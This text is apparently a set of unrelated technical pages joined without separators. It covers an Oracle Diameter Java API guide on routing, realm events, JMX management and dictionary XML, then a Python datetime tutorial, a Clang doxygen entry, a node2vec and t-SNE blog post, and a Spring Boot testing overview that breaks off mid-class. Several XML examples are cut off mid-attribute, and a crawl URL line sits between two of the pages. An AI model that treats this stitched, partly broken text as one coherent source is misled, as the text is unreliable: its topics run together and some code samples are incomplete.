myStack.createDiameterRoute("ExampleApp", "realm1.domain.com",
                            "aaa://peer1.realm1.domain.com", 1);
myStack.createDiameterRoute("ExampleApp", "realm1.domain.com",
                            "aaa://peer2.realm1.domain.com", 2);
myStack.createDiameterRoute("ExampleApp", "realm2.domain.com",
                            "aaa://peer.realm2.domain.com:41002", 1);
Note: If a peer name (FQDN) is used in createDiameterRoute() and if that peer is not yet known to the local stack, a transport connection is initiated with the peer using the specified peer URI (taking into account any URI optional information such as port number and transport protocol). On the contrary, if the peer specified by the FQDN part of the URI is already known, the URI is ignored, and the existing peer entry is added to the routing table for the specified realm and application ID.
The DiameterRealmStateChangeEvent class is used to notify the application of the reachability or unreachability of a remote realm as a result of peers coming up or down. This is important because the Diameter stack will not accept an outgoing message for which the remote realm is not available. Therefore, the application should wait until the realm is available before sending requests.
A RealmStateChange event is passed to DiameterListener.processEvent() whenever the availability of a pair (Remote-Realm, Application-ID) changes. The availability of a remote realm for a given application ID depends on the availability of active connections to at least one remote peer that is able to serve the specific realm and application ID. When no such route is available, the application is not able to exchange messages with the remote realm peers.
Example B-2 illustrates a typical implementation of the DiameterListener.processEvent() method.
Example B-2 Implementing the DiameterListener.processEvent() Method
public void processEvent(DiameterEvent event)
{
    if (event instanceof DiameterRealmStateChangeEvent) {
        // A remote realm has become available or unavailable
        DiameterRealmStateChangeEvent rsce =
            (DiameterRealmStateChangeEvent)event;
        if (rsce.isRealmAvailable()) {
            System.out.println("Realm " + rsce.getRealm() + " is available");
        } else {
            System.out.println("Realm " + rsce.getRealm() + " is unavailable");
        }
    }
    // ...
}
Upon Diameter stack initialization, a set of defined counters is initialized and associated with each DiameterStack and DiameterProvider instance created by the application. These counters are defined in the DiameterStackImplMBean and DiameterProviderImplMBean management interfaces.
There are two ways to access these counters:

Directly, by calling one of the different methods defined in both management interfaces.

Remotely, by registering the Diameter MBeans to a JMX agent using the javax.management package. This package is provided in JDK 1.5 and later.
There are two management interfaces defined in the oracle.sdp.diameterimpl package:

DiameterStackImplMBean: This interface represents the management API for an instance of the DiameterStack interface.

DiameterProviderImplMBean: This interface represents the management API for an instance of the DiameterProvider interface.
Example B-3 illustrates how to directly get the value of one of these defined counters:
A Diameter application can be managed remotely by registering the Diameter MBeans to a JMX agent, and can be monitored using the Java JConsole program.
A Java application using the Diameter API can publish management information by registering instances of the DiameterStackImplMBean and DiameterProviderImplMBean interfaces to a JMX agent. This can be done as follows:
import javax.management.MBeanServerFactory;
import javax.management.MBeanServer;
import javax.management.ObjectName;
import java.util.List;
import oracle.sdp.diameter.*;

// Create DiameterStack and DiameterProvider instances.
// DiameterStack myStack = ...
// DiameterProvider myProvider = ...

List srvList = MBeanServerFactory.findMBeanServer(null);
if (srvList.isEmpty() == false) {
    MBeanServer server = (MBeanServer)srvList.iterator().next();
    try {
        ObjectName name;
        name = new ObjectName(
            "oracle.sdp.diameterimpl:name=DiameterProvider");
        server.registerMBean(myProvider, name);
        name = new ObjectName(
            "oracle.sdp.diameterimpl:name=DiameterStack");
        server.registerMBean(myStack, name);
    } catch (Exception e) {
        // Handle register exception
        // ...
    }
}
Note: This code requires JDK 1.5 or later. Previous versions do not have the required javax.management package.
If you intend to allow remote access to the MBeans, you must define the Java property com.sun.management.jmxremote when running your application, as follows:
java -Dcom.sun.management.jmxremote -classpath mdiameter.jar MyApplication
When you have a Diameter application running -- and provided you have registered the MBeans as described above -- you can use the JDK's jconsole application to browse the management characteristics of the stack and application.
Start jconsole as follows:
jconsole
And then select the application's JVM from the local list. The Diameter MBeans should be visible under the MBeans tab.
This section includes the following topics:
When a user's application requires using commands or AVPs that are not defined in the default loaded application dictionary, the user can extend the dictionary to define new command and/or AVP syntaxes to be used by the Diameter stack.
The root or top-level element of a Diameter dictionary extension is the <dictionary> element:
<dictionary>
  .... (other elements)
</dictionary>
The <dictionary> element contains zero or more <vendor> elements and zero or more <application> elements.
The <vendor> element defines a vendor by a name and an associated IANA enterprise code.

The <vendor> attributes are:
The vendor id attribute must be unique across all <vendor> element definitions of the dictionary. The value 0 is dedicated to the base protocol, which corresponds to the syntaxes defined in [RFC-3588] and [RFC-4006].

The vendor name attribute is some text describing the vendor.
In Example B-4, the <vendor> element defines the vendor named "3GPP" whose enterprise code is 10415:
Example B-4 Defining a Vendor
<dictionary>
  <vendor id="10415" name="3GPP">
    ....(other elements)
  </vendor>
</dictionary>
The <vendor> element contains zero or more <returnCode> elements and zero or more <avp> elements.
One of the ways in which the Diameter protocol can be extended is through the addition of new applications.
The <application> element defines the new commands needed to support a new vendor Diameter application.

The <application> attributes are:
The application id attribute is the IANA-assigned Application Identifier for this application. The value 0 is dedicated to the base protocol, which corresponds to the commands defined in RFC-3588 and RFC-4006.

The application name attribute is the human-readable name of this application.

The application vendor attribute is the name of the application vendor as previously defined in the <vendor> element.

The application service-type attribute defines the type of service delivered by the application. Possible values are "Acct" for accounting and "Auth" for authorization.
In Example B-5, the <application> element contains information for the 3GPP accounting "Rf" application, identified by the value "3":
Example B-5 Defining an <application> Element
<dictionary>
  <application id="3" name="Rf" vendor="3GPP" service-type="Acct">
    ....(other elements)
  </application>
</dictionary>
The <application> element contains zero or more <command> elements.
A <command> element defines the attributes for a command.

The <command> attributes are:
The command name attribute defines the name of the command. Because only one command is defined for both the "Request" and "Answer" portions, the "Accounting" command defines both "Accounting-Request" and "Accounting-Answer" messages.

The command code attribute defines the command code used to transmit this command.
In Example B-6, the Rf application contains the command "Accounting" whose code is 271:
The <returnCode> element defines a possible value of the Result-Code AVP. In Example B-7, the 3GPP vendor defines the returnCode 5030, named DIAMETER_USER_UNKNOWN.
The <avp> element defines an AVP as described in RFC-3588.

The <avp> attributes are:
The avp name attribute is the human-readable name of this AVP.

The avp code attribute defines the integer value used to encode the AVP for transmission on the network.

The avp mandatory attribute defines whether the mandatory bit of this AVP should or should not be set. Possible values are "must" or "mustnot".

The avp protected attribute defines whether the protected bit of this AVP should or should not be set. Possible values are "may" or "maynot".

The avp may-encrypt attribute defines whether the AVP has to be encrypted in case of CMS security usage. Possible values are "yes" or "no".

The avp vendor-specific attribute specifies whether this is a vendor-specific AVP. Possible values are "yes" or "no".
In Example B-8, the 3GPP vendor extends the dictionary with the AVP "Application-provided-called-party-address".
Example B-8 Defining the <avp> Element
<dictionary>
  <vendor id="10415" name="3GPP">
    <avp name="Application-provided-called-party-address" code="837"
         mandatory="mustnot" protected="may" may-
      ....
    </avp>
  </vendor>
</dictionary>
The <avp> element contains either a <type> element or a <grouped> element.
The <type> element defines the data type of the AVP in which it appears. This element must appear in all non-grouped AVP definitions.

The type-name attribute of the <type> element contains the data type name as defined in RFC-3588. Possible values are:
"OCTETSTRING"
"INTEGER32"
"INTEGER64"
"UNSIGNED32"
"UNSIGNED64"
"FLOAT32"
"FLOAT64"
"ADDRESS"
"IPADDRESS"
"TIME"
"UTF8STRING"
"DIAMETERIDENTITY"
"DIAMETERURI"
"IPFILTERRULE"
"QOSFILTERRULE"
"ENUMERATED"
"GROUPED"
Note: These values are case-sensitive.
In Example B-9, the AVP "Application-provided-called-party-address" is an UTF8String.
The <enum> element defines a name which is mapped to an Unsigned32 value used in encoding and decoding AVPs of type Unsigned32. Enumerated elements should only be used with Unsigned32-typed AVPs.
The <enum> element's attributes are:

The enum name attribute is the text corresponding to a particular value for the attribute.

The enum code attribute is the Unsigned32 value corresponding to this enumerated value.
In Example B-10, the Accounting-Record-Type AVP has four values: EVENT_RECORD, START_RECORD, INTERIM_RECORD and STOP_RECORD.
Example B-10 Defining the <enum> Element
<dictionary>
  <vendor id="10415" name="3GPP">
    <avp name="Accounting-Record-Type" code="480"
         mandatory="must" protected="may" may-
      <type type-
      <enum name="EVENT_RECORD" code="1"/>
      <enum name="START_RECORD" code="2"/>
      <enum name="INTERIM_RECORD" code="3"/>
      <enum name="STOP_RECORD" code="4"/>
    </avp>
  </vendor>
</dictionary>
The <grouped> element defines an AVP which encapsulates a sequence of AVPs together as a single payload. It consists of grouping one or more <gavp> elements. This way, a single "grouped" element can contain references to multiple AVPs. Each <gavp> element holds an AVP name and a vendor-id attribute.
The <gavp> attributes are:
The gavp name attribute must correspond to some existing AVP's name attribute.

The gavp vendor-id attribute refers to an existing vendor's id attribute.
In Example B-11, the 3GPP vendor defines an AVP named "CC-Money" which is a set of previously defined AVPs named "Unit-Value" and "Currency-Code".
Once the Diameter dictionary extension has been defined, use the extendGrammar() method to apply the extension to the default dictionary as follows:
//--> Define dictionary extension string
String myDictionary =
    "<dictionary>\n" +
    "  <vendor id=\"10415\" name=\"3GPP\">\n" +
    "  </vendor>\n" +
    "  <application id=\"3\" name=\"Rf\" vendor=\"3GPP\" \n" +
    "      service-type=\"Acct\">\n" +
    "    <command name=\"Accounting\" code=\"271\" />\n" +
    "  </application>\n" +
    "</dictionary>\n";

//--> Apply new extension to current dictionary
try {
    myStack.extendGrammar(myDictionary);
} catch (DiameterException e) {
    // Handle dictionary syntax errors
    ...
}
For increased flexibility in a real application, you may want to read the XML syntax description from a file rather than having it embedded in the Java source code. This way, it becomes possible to change the mapping between names and codes without recompiling the application.
The 3GPP Rf Interface dictionary is returned by getRfDictionary(), and the 3GPP Ro Interface dictionary is returned by getRoDictionary(); both can be extended by the Diameter stack.
The DiameterTraceLoggerListener class is an interface to the Diameter tracing and logging mechanism. This interface represents the communication channel implemented by an application to receive debug traces and logs from the Diameter stack implementation. Logs are messages targeted to the user of DiameterStack. Traces are for internal use and are meaningful only to people with a good knowledge of the DiameterStack implementation.
All the messages that may be sent through the DiameterTraceLoggerListener.log() logging interface are defined in LogMessages.def. There is no definition file for trace messages.
By default, logs are sent to stdout and traces are not sent. This behavior may be modified by users either by registering a user-defined subclass of DiameterTraceLoggerListener or by defining specific environment variables. An example of a DiameterTraceLoggerListener implementation is as follows:
class MyTraceLoggerListener implements DiameterTraceLoggerListener
{
    // true or false.
    public boolean isTracingEnabled()
    {
        return true;
    }

    public void log(String file, int line, int severity, String message)
    {
        String severityName;
        switch (severity) {
        case LOG_INFO_SEVERITY:
            severityName = "INFO";
            break;
        case LOG_WARNING_SEVERITY:
            severityName = "WARNING";
            break;
        case LOG_ERROR_SEVERITY:
            severityName = "ERROR";
            break;
        case LOG_DISASTER_SEVERITY:
            severityName = "DISASTER";
            break;
        default:
            severityName = "?";
            break;
        }
        // ...
    }

    public void trace(String file, int line, int mask, String message)
    {
        System.err.println(...);
    }
}
Python has a reasonably good standard library module for handling dates and times, but it can be a little confusing to a beginner, probably because the first code they encounter will look something like the below with very little explanation.
import datetime

print("Running on %s" % (datetime.date.today()))
myDate = datetime.datetime(2018, 6, 18, 16, 13, 0)
Why is it datetime.datetime? The explanation is simple, but it's one I've rarely seen included.
All Python's classes for handling dates and times are in the module called datetime (naturally enough). This module contains a class for dates with no time element (datetime.date), a class for times (datetime.time) and a class for when you need both, called unsurprisingly (but a little unfortunately) datetime.datetime, hence the code above.

It also contains 2 more classes: datetime.timedelta, which is the interval between two dates / datetimes (the result of subtracting one datetime from another), and tzinfo, short for time zone info, which is used to handle timezones in the time and datetime classes.
To add to the confusion, if you want to get the date / time / datetime as of now, there is not a standard across the three: datetime uses the now() method, date uses the today() method and time does not have one! You have to use datetime and get the time part, as below.
import datetime

# Get the date and time as of now as a datetime
print(datetime.datetime.now())

# Get the date as of now (today)
print(datetime.date.today())

# Get the time as of now - have to use datetime!
print(datetime.datetime.now().time())
The confusion does not end there. If you want to format the date / time / datetime in a particular way you can use the strftime() method – probably short for string format time. The same method exists in all three classes. Why it is called time and not date or something more generic is beyond me; datetime.date.strftime() makes little sense.
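For example, using the myDate value from the opening snippet:

```python
import datetime

myDate = datetime.datetime(2018, 6, 18, 16, 13, 0)

# The same strftime() method works on all three classes
print(myDate.strftime("%A %d %B %Y at %H:%M"))  # Monday 18 June 2018 at 16:13
print(myDate.date().strftime("%d/%m/%Y"))       # 18/06/2018
print(myDate.time().strftime("%H:%M:%S"))       # 16:13:00
```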
If you are reading in strings and need them parsed into a date / time / datetime there is the strptime() method – probably short for string parse time – but this only exists in the datetime class. So you have to use a similar trick as above: create a datetime and extract just the date or time part.
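For example, to parse a string and keep just the date or time part:

```python
import datetime

# strptime() only exists on datetime - parse first, then extract
dt = datetime.datetime.strptime("2018-06-18 16:13", "%Y-%m-%d %H:%M")
print(dt.date())   # 2018-06-18
print(dt.time())   # 16:13:00
```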
Once you get past the quirks above, you should find the datetime module straightforward to use. However, if you do find yourself needing a library with more power, try the dateutil library. It can be installed with the usual pip install python-dateutil command.
Abstract base class to use for preprocessor-based frontend actions.
#include "clang/Frontend/FrontendAction.h"
Abstract base class to use for preprocessor-based frontend actions.
Definition at line 287 of file FrontendAction.h.
Provides a default implementation which aborts; this method should never be called by FrontendAction clients.
Implements clang::FrontendAction.
Definition at line 1024 of file FrontendAction.cpp.
Does this action only use the preprocessor?
If so, no AST context will be created, and this action will be invalid with AST file inputs.
Implements clang::FrontendAction.
Definition at line 295 of file FrontendAction.h. | http://clang.llvm.org/doxygen/classclang_1_1PreprocessorFrontendAction.html | CC-MAIN-2018-47 | en | refinedweb |
Exploring node2vec - a graph embedding algorithm
In my explorations of graph based machine learning, one algorithm I came across is called node2Vec. The paper describes it as "an algorithmic framework for learning continuous feature representations for nodes in networks".
So what does the algorithm do? From the website:
The node2vec framework learns low-dimensional representations for nodes in a graph by optimizing a neighborhood preserving objective. The objective is flexible, and the algorithm accommodates for various definitions of network neighborhoods by simulating biased random walks.
Running node2Vec
We can try out an implementation of the algorithm by executing the following instructions:
git clone git@github.com:snap-stanford/snap.git
cd snap/examples/node2vec
make
We should end up with an executable file named
node2vec:
$ ls -alh node2vec
-rwxr-xr-x 1 markneedham staff 4.3M 11 May 08:14 node2vec
The download includes the Zachary Karate Club dataset. We can inspect that dataset to see what format of data is expected.
The data lives in
graph/karate.edgelist.
The contents of that file are as follows:
cat graph/karate.edgelist | head -n10
1 32
1 22
1 20
1 18
1 14
1 13
1 12
1 11
1 9
1 8
The algorithm is then executed like this:
./node2vec -i:graph/karate.edgelist -o:emb/karate.emb -l:3 -d:24 -p:0.3 -dr -v
$ cat emb/karate.emb | head -n5
35 24
31 -0.0419165 0.0751558 0.0777881 -0.13651 -0.0723484 0.131121 -0.133643 0.0329049 0.0891693 0.0898324 0.0177763 -0.0947387 0.0152228 -0.00862188 0.0383254 0.222333 0.117794 0.189328 0.0327467 0.142506 -0.0787722 0.0757344 -0.0127497 -0.0305164
33 -0.105675 0.287809 0.20373 -0.247271 -0.222551 0.257689 -0.258127 0.0844224 0.182316 0.178839 0.0792992 -0.166362 0.114856 0.0422123 0.152787 0.551674 0.332224 0.487846 0.0619851 0.386913 -0.142459 0.173472 0.0184598 -0.100818
34 0.0121748 0.0941794 0.20482 -0.430609 -0.08399 0.293788 -0.322655 0.0704057 0.116873 0.214754 0.138378 -0.207141 -0.0159013 -0.238914 0.037141 0.541439 0.324653 0.458905 0.0216556 0.270057 -0.204671 0.135203 -0.0818273 -0.122353
14 -0.0722407 0.162659 0.111612 -0.20907 -0.11984 0.15896 -0.175391 0.0642012 0.094021 0.125609 0.0465577 -0.131715 0.0683675 -0.0097801 0.0467595 0.340551 0.210111 0.279932 0.0283343 0.231359 -0.112208 0.114253 0.00908989 -0.0907061
We now have an embedding for each of our people.
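As an aside, the .emb format is easy to read back: the first line is a header with the node count and dimensionality, and each following line is a node id plus its vector. A small standard-library parser (illustrative only, not part of node2vec) might look like:

```python
def load_embeddings(text):
    """Parse node2vec .emb output into {node_id: vector}."""
    lines = text.strip().splitlines()
    num_nodes, dims = map(int, lines[0].split())  # header: "<nodes> <dims>"
    embeddings = {}
    for line in lines[1:]:
        node_id, *values = line.split()
        embeddings[node_id] = [float(v) for v in values]
    return embeddings

sample = """3 4
1 0.1 0.2 0.3 0.4
2 -0.1 0.0 0.5 0.2
3 0.3 0.3 -0.2 0.1"""

emb = load_embeddings(sample)
print(len(emb), len(emb["1"]))  # 3 4
```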
These embeddings aren’t very interesting on their own but we can do interesting things with them. One approach when doing exploratory data analysis is to reduce each of the vectors to 2 dimensions so that we can visualise them more easily.
t-SNE
t-Distributed Stochastic Neighbor Embedding (t-SNE) is a popular technique for doing this and has implementations in many languages. We’ll give the Python version a try, but there is also a Java version if you prefer that.
Once we’ve downloaded that we can create a script containing the following code:
from tsne import tsne
import numpy as np
import pylab

X = np.loadtxt("karate.emb", skiprows=1)
X = np.array([x[1:] for x in X])

Y = tsne(X, 2, 50, 20.0)

pylab.scatter(Y[:, 0], Y[:, 1], 20)
pylab.show()
We load the embeddings from the file we created earlier, skipping the header row with skiprows=1 and then stripping the node id from the start of each row, since we aren't interested in it here. If we run the script, it will output this chart:

It’s not all that interesting to be honest! This type of visualisation will often reveal a clustering between items but that isn’t the case here.
Now I need to give this a try on a bigger dataset to see if I can find some interesting insights!
About the author
Mark Needham is a Developer Relations Engineer for Neo4j, the world's leading graph database. | https://markhneedham.com/blog/2018/05/11/exploring-node2vec-graph-embedding-algorithm/ | CC-MAIN-2018-47 | en | refinedweb |
#include <string>
#include <wx/string.h>
Go to the source code of this file.
Definition at line 47 of file utf8.h.
Referenced by UTF8::operator+=(), UTF8::operator=(), and UTF8::UTF8().
Definition at line 27 of file numeric_evaluator.cpp.
Function IsUTF8 tests a c-string to see if it is UTF8 encoded.
BTW an ASCII string is a valid UTF8 string.
Definition at line 173 of file utf8.cpp.
References UTF8::end(), next(), and UTF8::uni_forward(). | http://docs.kicad-pcb.org/doxygen/utf8_8h.html | CC-MAIN-2018-47 | en | refinedweb |
Course: JavaScript for PHP Geeks: ReactJS (with Symfony) Tutorial
It works like this: we create React element objects and ask React to render them. But, React has another important object: a Component. Ooooooooo.
It looks like this: create a class called RepLogApp and extend something called React.Component. A component only needs to have one method: render(). Inside, return whatever element objects you want. In this case I'm going to copy my JSX from above and, here, say return and paste.
This is a React component. Below, I'm going to use console.log() and then treat my RepLogApp as if it were an element: <RepLogApp />. Finally, below, instead of rendering an element, we can render the component with that same JSX syntax: <RepLogApp />.
Ok, go back and refresh! Awesome! We get the exact same thing as before! And, check out the console! The component becomes a React element!
This React component concept is something we're going to use a lot. But, I don't want to make it seem too important: because it's a super simple concept. In PHP, we use classes as a way to group code together and give that code a name that makes sense. If we organize 50 lines of code into a class called "Mailer", it becomes pretty obvious what that code does... it spams people! I mean, it emails valued customers!
React components allow you to do the same thing for the UI: group elements together and give them a name. In this case, we've organized our h2 and span React elements into a React component called RepLogApp. React components are sort of a named container for elements.
By the way, React components do have one rule: their names must start with a capital letter. Actually, this rule is there to help JSX: if we tried using a <repLogApp /> component with a lowercase "r", JSX would actually think we wanted to create some new hipster repLogApp HTML element, just like how a <div> becomes a <div>. By starting the component name with a capital letter, JSX realizes we're referring to our component class, not some hipster HTML element with that name.
Anyways, a few minor housekeeping things. Notice that Component is a property on the React object. The way we have things now is fine. But, commonly, you'll see React imported like this: import React, { Component } from 'react'. Thanks to this, you can just extend Component.
This is pretty much just a style thing. And... honestly... it's one of the things that can make React frustrating. What I mean is, React developers like to use a lot of the newer, fancier ES6 syntaxes. In this case, the react module exports an object that has a Component property. This syntax is "object destructuring": it grabs the Component key from the object and assigns it to a new Component variable. Really, this syntax is not that advanced, and actually, we're going to use it a lot. But, this is one of the challenges with React: you may not be confused by React, you may be confused by a fancy syntax used in a React app. And we definitely don't want that!
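To be clear, destructuring is plain JavaScript with nothing React-specific about it. Here is a tiny runnable sketch that uses a made-up stand-in object (fakeReact is hypothetical, not the real react module):

```javascript
// A stand-in for the kind of object `import React from 'react'` gives you
const fakeReact = {
    Component: class Component {},
    createElement: (type, props, ...children) => ({ type, props, children }),
};

// Object destructuring: grab the Component key into its own variable
const { Component } = fakeReact;

console.log(Component === fakeReact.Component); // true
```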
We can do the same thing with react-dom. Because, notice, we're only using the render key. So instead of importing all of react-dom, import { render } from 'react-dom'. Below, use the render() function directly.
This change is a little bit more important because Webpack should be smart enough to perform something called "tree shaking". That's not because Webpack hates nature, that's just a fancy way of saying that Webpack will realize that we only need the render() function from react-dom: not the whole module. And so, it will only include the code needed for render in our final JavaScript file.
Anyways, these are just fancier ways to import exactly what we already had.
Oh, but, notice: it looks like the React variable is now an unused import. What I mean is, we don't ever use that variable. So, couldn't we just remove it and only import Component?
Actually, no! Remember: the JSX code is transformed into React.createElement(). So, strangely enough, we are still using the React variable, even though it doesn't look like it. Sneaky React.
To make sure we haven't broken anything... yet, go back and refresh. All good.
Just like in PHP, we're going to follow a pattern where each React component class lives in its own file. In the assets/js directory, create a new RepLog directory: this will hold all of the code for our React app. Inside, create a new file called RepLogApp. Copy our entire component class into that file.
Woh. Something weird just happened. Did you see it? We only copied the
RepLogApp class. But when we pasted, PhpStorm auto-magically added the import for us! Thanks PhpStorm! Gold star!
But, check out this error:
ESLint: React must be in scope when using JSX.
Oh, that's what we just talked about! This is one of those warnings that comes from ESLint. Update the import to also import React.
Now, to make this class available to other files, use export default class RepLogApp.
Back in rep_log_react.js, delete the class and, instead, import RepLogApp from './RepLog/RepLogApp'. Oh, and it's not too important, but we're actually not using the Component import anymore. So, trash it.
Awesome! Our code is a bit more organized! And when we refresh, it's not broken, which is always my favorite.
And actually, this is an important moment because we've just established a basic structure for pretty much any React app. First, we have the entry file - rep_log_react.js - and it has just one job: render our top level React component. In this case, it renders RepLogApp. That's the only component that it needs to render because eventually, the RepLogApp component will contain our entire app.
So the structure is: the one entry file renders the one top-level React component, and it returns all the elements we need from its render() method.
And, that's our next job: to build out the rest of the app in RepLogApp. But first, we need to talk about a super-duper important concept called props. | https://symfonycasts.com/screencast/reactjs/react-component | CC-MAIN-2018-47 | en | refinedweb |
Provided by: libaudiofile-dev_0.3.6-2ubuntu0.15.10.1_amd64
NAME
afInitAESChannelDataTo, afInitAESChannelData - initialize AES non-audio data in an audio file setup
SYNOPSIS
#include <audiofile.h>

void afInitAESChannelDataTo(AFfilesetup setup, int track, int willHaveData);
void afInitAESChannelData(AFfilesetup setup, int track);
PARAMETERS
setup is a valid file setup returned by afNewFileSetup(3).

track specifies a track within the audio file setup. track is always AF_DEFAULT_TRACK for all currently supported file formats.

willHaveData is a boolean-valued integer indicating whether AES non-audio data will be present.
DESCRIPTION
Given an AFfilesetup structure created with afNewFileSetup(3) and a track identified by track (AF_DEFAULT_TRACK for all currently supported file formats), afInitAESChannelDataTo initializes the track to contain or not contain AES non-audio data. afInitAESChannelData behaves similarly but always initializes the track to contain AES non-audio data. Currently only AIFF and AIFF-C file formats can store AES non-audio data; this data is ignored in all other file formats.
ERRORS
afInitAESChannelDataTo and afInitAESChannelData can produce the following errors:

AF_BAD_FILESETUP
setup represents an invalid file setup.

AF_BAD_TRACKID
track represents an invalid track identifier.
SEE ALSO
afNewFileSetup(3)
AUTHOR
Michael Pruett <michael@68k.org> | http://manpages.ubuntu.com/manpages/xenial/en/man3/afInitAESChannelData.3.html | CC-MAIN-2018-47 | en | refinedweb |
Technic235 answered
Sep 23, '18
c#·start·startcoroutine·stopcoroutine·co-routine
5 Replies
13 Votes
ausernme commented
Sep 14, '18
coroutine·namespace·startcoroutine·not found
2 Replies
0 Votes
jashan answered
Aug 27, '18
invokerepeating·startcoroutine
4 Replies
6 Votes
myzzie answered
Aug 20, '18
startcoroutine
1 Reply
behshad_yaghoubi edited
Aug 2, '18
in Help Room
0 Replies
AdityaViaxor answered
Jul 12, '18
collision·trigger·startcoroutine·coin
3 Replies
1 Votes
esraahamad97 edited
Jun 30, '18
in Help Room
Thomas-Hawk edited
Jun 25, '18
coroutine·ienumerator·startcoroutine·iterate·garbage collection
IWannaTaco asked
Jun 15, '18
in Help Room
b2hinkle asked
Jun 12, '18
c#·instantiate·spawn·ienumerator·startcoroutine
UnbreakableOne answered
Jun 11, '18
c#·coroutine·ienumerator·startcoroutine·coroutine errors
kordou edited
Mar 29, '18
in Help Room
TreyH commented
Mar 14, '18
coroutine·coroutines·startcoroutine·enumerate
Capricornum commented
Feb 14, '18
in Help Room
spokrock answered
Feb 11, '18
coroutine·start·startcoroutine·monobehavior
5 Votes
Harinezumi commented
Feb 9, '18
c#·www·coroutines·mysql·startcoroutine
Obsessi0n commented
Feb 2, '18
in Help Room
jayadratha commented
Jan 9, '18
dontdestroyonload·startcoroutine
jamessmith2012 commented
Jan 5, '18
in Help Room
megabrobro commented
Dec 21, '17
unity 5·coroutine·coroutines·startcoroutine
Bonfire-Boy commented
Dec 15, '17
startcoroutine
aldonaletto edited
Dec 1, '17
coroutine·startcoroutine·stack
AmrmHady answered
Nov 12, '17
in Help Room
2 Votes
ppizarro answered
Oct 23, '17
in Help Room
DJJD commented
Oct 17, '17
waitforseconds·coroutines·startcoroutine·yield waitforseconds·stopcoroutine
Skurlexx answered
Oct 7, '17
startcoroutine
tmalhassan commented
Oct 4, '17
c#·waitforseconds·method·startcoroutine
tomhendriks1102 answered
Sep 28, '17
coroutine·string·method·startcoroutine·stopcoroutine
goutham12 answered
Sep 27, '17
c#·unity 5·coroutine·startcoroutine
akashif asked
Aug. | https://answers.unity.com/topics/startcoroutine.html | CC-MAIN-2018-47 | en | refinedweb |
Testing is a crucial part in the business of software development. It ensures performance and quality of the product. The Java platform supports many testing frameworks. Spring introduces the principle of dependency injection on unit testing and has first-class support for integration testing. This article tries to give a quick introductory idea about the testing support provided by the Spring framework and how it is applied with Spring Boot.
An Overview
Testing is a process that ensures that the quality of the software adheres to the standard laid down by the requirements specification and performs smoothly with the fewest possible glitches. For this, a technique called unit testing is the simplest to achieve and can be applied on all applications in their development. Unit testing allows each component of the application to be tested separately. Further, when these individual components are integrated and tested to ensure that multiple components collaborate to work well in the system, it is called integration testing.
In a development environment, usually test codes are written separately and are not mixed with the normal code. In fact, testing a program is distinctly a separate project and is stored in a separate directory. The tests constitute test cases that are applied to test the application manually or automatically. Automated test cases are applied repeatedly at different phases of the software development process. This, by the way, is the most recommended process of the Agile framework. And Spring, being a proponent of the framework, readily supports it.
Java is never lacking in support and has numerous testing frameworks—such as JUnit, TestNG, Mockito, and so forth—at its disposal. They also go pretty well with Spring, yet perhaps the distinctive quality is Spring's incorporation of IoC into the game.
Unit Testing
The major advantage of applying dependency injection is that it makes program code much easier to test, because the code is much less dependent on the container than it may be with other approaches. The POJOs are individually testable by simple instantiation without adhering to any dependency. Sometimes the line between unit and integration testing blurs in the interest of better testing, and we need to go beyond unit testing and start performing integration testing without deploying the application or connecting to other dependent infrastructure. In such a case, we can mock objects to obtain the value of integration yet test our code in isolation. For example, we can test a service layer or a controller by stubbing or mocking DAO objects, without actually accessing the persistent data.
The Spring framework provides numerous mock objects and support classes. Some of them are as follows.
Mock Objects
The package called org.springframework.mock.env contains classes that are useful for creating out-of-container unit tests that depend on environment specific properties:
- MockEnvironment: This class is a mock implementation of the Environment interface.
- MockPropertySource: This class is a mock implementation of the PropertySource abstract class.
The org.springframework.mock.jndi package contains classes which can be used to set up a JNDI environment for test suites or standalone applications.
- ExpectedLookupTemplate: An extension of JndiTemplate and essentially creates a mock object of its type.
- SimpleNamingContext: Implementation of JNDI naming context that binds plain objects to String names for a test environment as well as standalone applications.
SimpleNamingContextBuilder: This is essentially a builder-pattern class for SimpleNamingContext.
There are several classes under org.springframework.mock.web. These classes enable us to create comprehensive mock objects for the Servlet API. These mock objects are particularly useful for testing Web contexts, controllers, and filters.
The classes in the org.springframework.mock.http.server.reactive package help in creating a mock for ServerHttpRequest and ServerHttpResponse for WebFlux applications.
Apart from these, there are quite a number of utility classes in the org.springframework.test.util package, such as the ReflectionTestUtils, which is a collection for reflection-based utility methods used in both unit and integration testing. The ModelAndViewAssert class contained in org.springframework.test.web can be used to test Spring MVC ModelAndView objects.
Integration Testing
The Spring support for integration testing enables one to perform integration testing without actually deploying the application server or connecting to other dependent infrastructure. This is a huge plus point because it enables us to test the wiring of Spring IoC container contexts. We can also, for example, test data source accessibility or SQL statements by using JDBC or an ORM tool. The org.springframework.test package contains all the required classes for integration testing with the Spring container.
Spring Boot
Spring Boot provides a set of utilities and annotation to help in the process of unit and integration testing and, of course, makes life easier. The core items for the testing are contained in the modules called spring-boot-test and the configuration is provided by the modules called spring-boot-test-autoconfigure.
We can simply use spring-boot-starter-test in pom.xml to transitively pull in all the required dependencies in a Spring application. The support libraries for testing, as pulled in by the Maven file, are as follows:
- JUnit: It is the standard Java unit testing framework which provides an up-to-date foundation for developer-side testing on the JVM.
- Spring Test: Utilities and integration support for Spring Boot applications.
- AssertJ: A set of assertions to provide meaningful error messages that leverage readability and easy debugging.
- Hamcrest: Provides a library of matcher objects that help in creating flexible expressions.
- Mockito: Java Mocking framework.
- JSONassert: Helps in writing JSON unit tests and testing REST interfaces.
- JsonPath: Xpath for Json.
Spring Boot provides a volley of annotations to designate a test class and test specific parts of an application. For example, we can use the @SpringBootTest annotation to enable Spring Boot test features. This annotation loads the ApplicationContext used in a test through SpringApplication. Typically, the @SpringBootTest annotation is used in association with @RunWith(SpringRunner.class) and does a whole lot of things behind the scenes apart from just loading the ApplicationContext and having Spring beans autowired into the test instances. @SpringBootTest does not start the server by default. As a result, to test Web endpoints, we can use a mock environment as follows.
Here is a code snippet to illustrate the idea.
package org.springboot.app;

import static org.springframework.test.web.servlet.request.MockMvcRequestBuilders.*;
import static org.springframework.test.web.servlet.result.MockMvcResultHandlers.print;
import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.*;

import org.junit.*;
import org.junit.runner.RunWith;
import org.springboot.app.controller.*;
import org.springframework.boot.test.autoconfigure.web.servlet.AutoConfigureMockMvc;
import org.springframework.boot.test.context.SpringBootTest;
import org.springframework.test.context.junit4.SpringRunner;
import org.springframework.test.web.servlet.MockMvc;
import org.springframework.test.web.servlet.setup.MockMvcBuilders;

@RunWith(SpringRunner.class)
@SpringBootTest
@AutoConfigureMockMvc
